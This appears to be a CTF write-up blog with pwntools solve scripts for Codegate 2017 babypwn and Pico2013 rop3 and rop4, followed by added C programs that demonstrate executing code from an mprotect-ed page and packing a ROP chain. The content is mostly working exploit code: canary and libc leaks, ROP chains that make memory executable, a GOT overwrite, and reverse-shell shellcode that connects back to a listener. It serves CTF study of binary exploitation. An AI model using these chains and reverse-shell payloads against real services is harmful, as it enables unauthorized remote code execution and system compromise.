Codegate 2017 babypwn (+mprotect)


For this one too, instead of using the system function the binary provides, I solved it with shellcode and a reverse shell.



Binary


Solves

from pwn import *

context.log_level = 'debug'

b = './babypwn'
elf = ELF(b)
p = remote('localhost', 9999)

sa = lambda x, y : p.sendlineafter(x, y)
ru = lambda x    : p.recvuntil(x)
sl = lambda x    : p.sendline(x)

fd = 4                    # socket fd of the client connection inside the service
p1r = 0x08048b85          # pop ; ret
p2r = 0x08048b84          # pop ; pop ; ret
p3r = 0x08048b83          # pop ; pop ; pop ; ret
p4r = 0x08048eec          # pop ; pop ; pop ; pop ; ret  (send() takes 4 args)
send_ofs = 0x000e8350     # send@libc offset in the target libc
mpro_ofs = 0x000e2d50     # mprotect@libc offset in the target libc

# connect-back shellcode. connect() leaves the socket in ebp; dupsh() is added here
# (the original only called connect()) to dup it onto stdin/stdout/stderr and exec sh.
shellcode = asm(shellcraft.i386.linux.connect('localhost', 10101)
                + shellcraft.i386.linux.dupsh(), arch='i386')
log.success('shellcode generated!')
print(hexdump(shellcode))
writeable = 0x0804b000 # 0x0804b000 ~ 0x0804c000, rw- data page that mprotect will make rwx

def menu(x):
    ru(' > ')
    sl(str(x))

def echo(x):
    menu(1)
    sa(' : ', x)

# leak canary: 40 bytes of 'A' plus sendline's '\n' land on the canary's null low byte,
# so the echo runs on into the upper 3 canary bytes (buffer offsets 0x29..0x2b)
echo(b'A'*40)
canary = b'\x00' + p.recv()[0x29:0x2c]   # canary occupies 0x28~0x2c, low byte is 0x00
canary = u32(canary)

log.info('canary leaked : 0x%x' % canary)

# leak send@libc (reconnect: forking service, so the canary and libc mapping carry over)
p = remote('localhost', 9999)

payload  = b'A'*40
payload += p32(canary)
payload += b'ABCD'*3 # dummy(8) + SFP
payload += p32(elf.plt['send'])     # send(fd, &send@got, 4, 0)
payload += p32(p4r)
payload += p32(fd)
payload += p32(elf.got['send'])
payload += p32(0x4)
payload += p32(0)

echo(payload)
menu(3)             # return from the vulnerable function: the chain starts running
sleep(0.2)
send_libc = u32(p.recv(4))
log.info('send@libc leaked : 0x%x' % send_libc)

libc_base = send_libc - send_ofs
mprotect_libc = libc_base + mpro_ofs

# write & run shellcode
p = remote('localhost', 9999)

payload  = b'A'*40
payload += p32(canary)
payload += b'ABCD'*3 # dummy(8) + SFP

# mprotect(writeable, 0x1000, 7): rw- data page -> rwx
payload += p32(mprotect_libc)
payload += p32(p3r)
payload += p32(writeable)
payload += p32(0x1000)
payload += p32(7)

# recv(fd, writeable, 0x100): read the shellcode into that page, then return into it
payload += p32(elf.plt['recv'])
payload += p32(writeable)           # return address after recv(): the shellcode
payload += p32(fd)
payload += p32(writeable)
payload += p32(0x100)

echo(payload)
menu(3)
sleep(0.2)
sl(shellcode)

p.interactive()
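What the first frame of that chain buys the exploit, reproduced in-process as an added example (this is not code from the post): an rw- page stands in for the binary's data page at 0x0804b000, code is copied into it the way recv() writes the shellcode, mprotect() is called with prot = 7 exactly as the chain does, and the page is then "returned into". A stub that returns 42 stands in for the shellcode so the result can be checked. It also shows the two details the chain has to get right: the start address has to be the page base (mprotect rejects anything else with EINVAL, which is why the script hard-codes writeable = 0x0804b000 rather than the shellcode address) and the length should be a whole number of pages. Assumptions: Linux on x86 or aarch64; an environment that forbids RWX mappings (SELinux execmem, W^X kernels) will make run_from_rw_page() return -3 instead of executing anything.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>

/* Stand-in "shellcode": returns 42 in the return register (assumed x86 or aarch64). */
#if defined(__x86_64__) || defined(__i386__)
static const unsigned char ret42_code[] = { 0xb8, 0x2a, 0x00, 0x00, 0x00, 0xc3 };             /* mov eax, 42 ; ret */
#elif defined(__aarch64__)
static const unsigned char ret42_code[] = { 0x40, 0x05, 0x80, 0x52, 0xc0, 0x03, 0x5f, 0xd6 }; /* mov w0, #42 ; ret */
#else
#error "ret42_code not provided for this architecture"
#endif

static size_t page_size(void)
{
    long pg = sysconf(_SC_PAGESIZE);
    return pg > 0 ? (size_t)pg : 4096;
}

/* Page containing addr: the value the script hard-codes as writeable = 0x0804b000. */
uintptr_t page_base(uintptr_t addr)
{
    return addr & ~(uintptr_t)(page_size() - 1);
}

/* Whole pages needed to cover [addr, addr+len): the script's len = 0x1000. */
size_t page_span(uintptr_t addr, size_t len)
{
    uintptr_t mask = page_size() - 1;
    return ((addr + len + mask) & ~mask) - page_base(addr);
}

/* 1. rw- page (the binary's data page), 2. copy code in (the recv() frame),
 * 3. mprotect(base, len, 7) (the mprotect frame), 4. ret into it.
 * Returns what the code returns, or a negative value on failure. */
int run_from_rw_page(const unsigned char *code, size_t len)
{
    size_t pg = page_size();
    if (len > pg) return -1;
    unsigned char *page = mmap(NULL, pg, PROT_READ | PROT_WRITE,
                               MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED) return -2;
    memcpy(page, code, len);
    if (mprotect(page, pg, PROT_READ | PROT_WRITE | PROT_EXEC) != 0) { /* prot = 7 */
        munmap(page, pg);
        return -3;
    }
    __builtin___clear_cache((char *)page, (char *)page + len); /* needed on aarch64, harmless on x86 */
    int (*entry)(void);
    memcpy(&entry, &page, sizeof entry);   /* data pointer -> function pointer without a cast warning */
    int r = entry();                       /* the chain's final ret into writeable */
    munmap(page, pg);
    return r;
}

/* Why the chain passes the page base and not the shellcode address: an unaligned
 * start is refused with EINVAL. Returns that errno (0 if the call was accepted). */
int mprotect_unaligned_errno(void)
{
    size_t pg = page_size();
    unsigned char *page = mmap(NULL, pg, PROT_READ | PROT_WRITE,
                               MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED) return -1;
    int e = 0;
    if (mprotect(page + 0x100, pg, PROT_READ | PROT_WRITE | PROT_EXEC) != 0) e = errno;
    munmap(page, pg);
    return e;
}

int main(void)
{
    printf("page_base(0x0804b123) = 0x%lx, span = 0x%zx\n",
           (unsigned long)page_base(0x0804b123), page_span(0x0804b123, 0x100));
    printf("code run from an rw- page after mprotect(7) returned %d\n",
           run_from_rw_page(ret42_code, sizeof ret42_code));
    printf("mprotect on a non page-aligned address: errno %d (EINVAL = %d)\n",
           mprotect_unaligned_errno(), EINVAL);
    return 0;
}
```

If run_from_rw_page() comes back with -3 the host is enforcing W^X on anonymous mappings, and an mprotect-based chain would fail against a service running there in the same way.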







Shell

(screenshot of the shell not reproduced)

Written by NoneType

Pwnable Newbie

Pico2013 - rop4


Since I solved rop3 with mprotect, I figured I had to do rop4 the same way! Then I looked at it, and it is a statically linked binary, which makes it enormously easier.



Binary


Solves

from pwn import *

b = './rop4'
elf = ELF(b)
p = process(b)

sa = lambda x, y : p.sendlineafter(x, y)
ru = lambda x    : p.recvuntil(x)
sl = lambda x    : p.sendline(x)

p1r = 0x0804859e    # pop ; ret
p2r = 0x08048e87    # pop ; pop ; ret
p3r = 0x080ae918    # pop ; pop ; pop ; ret
shellcode = asm(shellcraft.i386.linux.sh(), arch='i386')
writeable = 0x080ee000 # 0x080ee000 ~ 0x080f0000, rw- data pages of the static binary

payload = b'A'*140

# static link: mprotect and read are symbols in the binary itself, no libc leak needed
# mprotect(writeable, 0x1000, 7)
payload += p32(elf.symbols['mprotect'])
payload += p32(p3r)
payload += p32(writeable)
payload += p32(0x1000)
payload += p32(7)

# read(0, writeable+0x100, 0x100), then return into what was just read
payload += p32(elf.symbols['read'])
payload += p32(writeable+0x100)
payload += p32(0)
payload += p32(writeable+0x100)
payload += p32(0x100)

sl(payload)
sl(shellcode)

p.interactive()







Pico2013 - rop3


The challenge has been out for a long time and I had already solved it, so I had no interest in it, until one day a KakaoTalk message arrived.



Someone from the 햌낑 room messaged me on KakaoTalk saying it was fun and that I should try it, so I thought "sure, I'll do it~" and then months went by. Now, with the mindset of "just solve this one and then go play PUBG!", I wrote the payload and it worked in one shot (where did that focus come from..?)



Binary


You can also get it from github/ctfs, but I'm attaching it here in case that becomes a hassle later.



Solves

[18-01-08] + Looking at it now, I can't tell why I did a GOT overwrite. What was I thinking back then?

from pwn import *

b = './rop3'
elf = ELF(b)
p = process(b)

sa = lambda x, y : p.sendlineafter(x, y)
ru = lambda x    : p.recvuntil(x)
sl = lambda x    : p.sendline(x)

p1r = 0x08048443        # pop ; ret
p2r = 0x08048442        # pop ; pop ; ret
p3r = 0x0804855d        # pop ; pop ; pop ; ret
read_ofs = 0x000d5af0   # read@libc offset in the target libc
mpro_ofs = 0x000e2d50   # mprotect@libc offset in the target libc
shellcode = asm(shellcraft.i386.linux.sh(), arch='i386')
writeable = 0x0804a000 # 0x0804a000 ~ 0x0804b000

payload = b'A'*140

# print shellcode
log.info("Shellcode Generated : ")
print(hexdump(shellcode))


# Write Shellcode: read(0, writeable+0x100, 0x100)
payload += p32(elf.plt['read'])
payload += p32(p3r)
payload += p32(0)
payload += p32(writeable+0x100)
payload += p32(0x100)

# Leak Read@Libc: write(1, &read@got, 4)
payload += p32(elf.plt['write'])
payload += p32(p3r)
payload += p32(1)
payload += p32(elf.got['read'])
payload += p32(4)

# Write@Got Overwrite to mprotect: read(0, &write@got, 4)
# the chain is sent in one go, before the leak is known, so the computed
# mprotect address is fed back in through the GOT instead of the chain itself
payload += p32(elf.plt['read'])
payload += p32(p3r)
payload += p32(0)
payload += p32(elf.got['write'])
payload += p32(4)

# call mprotect & return to shellcode: write@plt now resolves to mprotect(writeable, 0x1000, 7)
payload += p32(elf.plt['write'])
payload += p32(writeable+0x100)     # return address: the shellcode written in the first frame
payload += p32(writeable)
payload += p32(0x1000)
payload += p32(7)

# Payload Send
sl(payload)
sl(shellcode) # write Shellcode

# 4 debug: read the shellcode back out of the process (/proc/<pid>/mem)
log.info("Shellcode Written!")
print(hexdump(p.leak(writeable+0x100, len(shellcode))))

# leak read@libc
read_libc = u32(p.recv(4))
log.info("Read@Libc : 0x%x" % read_libc)

# Calc mprotect@libc
base_libc = read_libc - read_ofs
mpro_libc = base_libc + mpro_ofs

# overwrite write@got with mprotect
sl(p32(mpro_libc))

p.interactive()
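All three scripts hand-pack the same frame shape, func | pop-N-ret gadget | args, and the one thing that silently breaks such a chain is a gadget whose pop count differs from the argument count (the babypwn chain needs p4r after send() and p3r after mprotect() for exactly this reason). The builder below, an added example and not code from the post, packs the rop3 chain that way and refuses a mismatched frame, and also checks the mprotect frame before it is packed. p3r and writeable are the post's values; the PLT/GOT addresses are placeholders that stand in for what the script reads from the ELF.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define CHAIN_MAX 64

typedef struct {
    uint32_t w[CHAIN_MAX];   /* dwords in stack order, lowest address first */
    size_t n;
} rop_chain;

/* One call frame as the scripts lay it out: func | gadget | arg0..argN-1.
 * func returns into the gadget, which pops the N args and rets into the next frame.
 * A gadget popping fewer dwords than argc rets into the middle of the args, one
 * popping more eats the next frame's func, so a mismatch is refused (-1). */
int chain_call(rop_chain *c, uint32_t func, uint32_t gadget, int gadget_pops,
               int argc, const uint32_t *args)
{
    if (argc < 0 || gadget_pops != argc) return -1;
    if (c->n + 2 + (size_t)argc > CHAIN_MAX) return -1;
    c->w[c->n++] = func;
    c->w[c->n++] = gadget;
    for (int i = 0; i < argc; i++) c->w[c->n++] = args[i];
    return 0;
}

/* Last frame: func returns straight into `next` (the shellcode), no cleanup gadget. */
int chain_tail(rop_chain *c, uint32_t func, uint32_t next, int argc, const uint32_t *args)
{
    if (argc < 0 || c->n + 2 + (size_t)argc > CHAIN_MAX) return -1;
    c->w[c->n++] = func;
    c->w[c->n++] = next;
    for (int i = 0; i < argc; i++) c->w[c->n++] = args[i];
    return 0;
}

/* An mprotect frame is only useful if the kernel will accept it: page-aligned
 * start, non-zero page-multiple length, PROT_READ|PROT_WRITE|PROT_EXEC. */
int mprotect_frame_ok(uint32_t addr, uint32_t len, uint32_t prot)
{
    return (addr & 0xfff) == 0 && len != 0 && (len & 0xfff) == 0 && prot == 7;
}

/* p32() over the whole chain after `pad` bytes of filler. Returns total bytes, 0 if cap is too small. */
size_t chain_pack(const rop_chain *c, size_t pad, unsigned char *out, size_t cap)
{
    size_t total = pad + 4 * c->n;
    if (total > cap) return 0;
    memset(out, 'A', pad);
    for (size_t i = 0; i < c->n; i++) {
        uint32_t v = c->w[i];
        out[pad + 4 * i + 0] = (unsigned char)(v & 0xff);          /* little-endian, like p32 */
        out[pad + 4 * i + 1] = (unsigned char)((v >> 8) & 0xff);
        out[pad + 4 * i + 2] = (unsigned char)((v >> 16) & 0xff);
        out[pad + 4 * i + 3] = (unsigned char)((v >> 24) & 0xff);
    }
    return total;
}

#define P3R        0x0804855du   /* pop;pop;pop;ret from the rop3 post */
#define WRITEABLE  0x0804a000u   /* rw- page from the rop3 post */
#define READ_PLT   0x08048300u   /* placeholder: elf.plt['read'] */
#define WRITE_PLT  0x08048310u   /* placeholder: elf.plt['write'] */
#define READ_GOT   0x0804a00cu   /* placeholder: elf.got['read'] */
#define WRITE_GOT  0x0804a010u   /* placeholder: elf.got['write'] */

/* The rop3 chain: read shellcode, leak read@got, overwrite write@got, call "write"
 * (now mprotect), return into the shellcode. Returns packed length, 0 on a bad frame. */
size_t build_rop3_chain(unsigned char *out, size_t cap)
{
    rop_chain c = { .n = 0 };
    uint32_t a1[] = { 0, WRITEABLE + 0x100, 0x100 };   /* read(0, buf, 0x100)       */
    uint32_t a2[] = { 1, READ_GOT, 4 };                /* write(1, &read@got, 4)    */
    uint32_t a3[] = { 0, WRITE_GOT, 4 };               /* read(0, &write@got, 4)    */
    uint32_t a4[] = { WRITEABLE, 0x1000, 7 };          /* mprotect(page, 0x1000, 7) */
    if (!mprotect_frame_ok(a4[0], a4[1], a4[2])) return 0;
    if (chain_call(&c, READ_PLT,  P3R, 3, 3, a1)) return 0;
    if (chain_call(&c, WRITE_PLT, P3R, 3, 3, a2)) return 0;
    if (chain_call(&c, READ_PLT,  P3R, 3, 3, a3)) return 0;
    if (chain_tail(&c, WRITE_PLT, WRITEABLE + 0x100, 3, a4)) return 0;
    return chain_pack(&c, 140, out, cap);
}

int main(void)
{
    unsigned char buf[512];
    size_t n = build_rop3_chain(buf, sizeof buf);
    printf("payload: %zu bytes (140 filler + %zu chain)\n", n, n - 140);
    for (size_t i = 140; i < n; i += 4)
        printf("  [%3zu] %02x %02x %02x %02x\n", i, buf[i], buf[i+1], buf[i+2], buf[i+3]);
    return 0;
}
```

Each of the four rop3 frames is 5 dwords, so the chain adds 80 bytes to the 140-byte filler; a frame that tried to pair p3r with send()'s four arguments is rejected before anything is packed.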







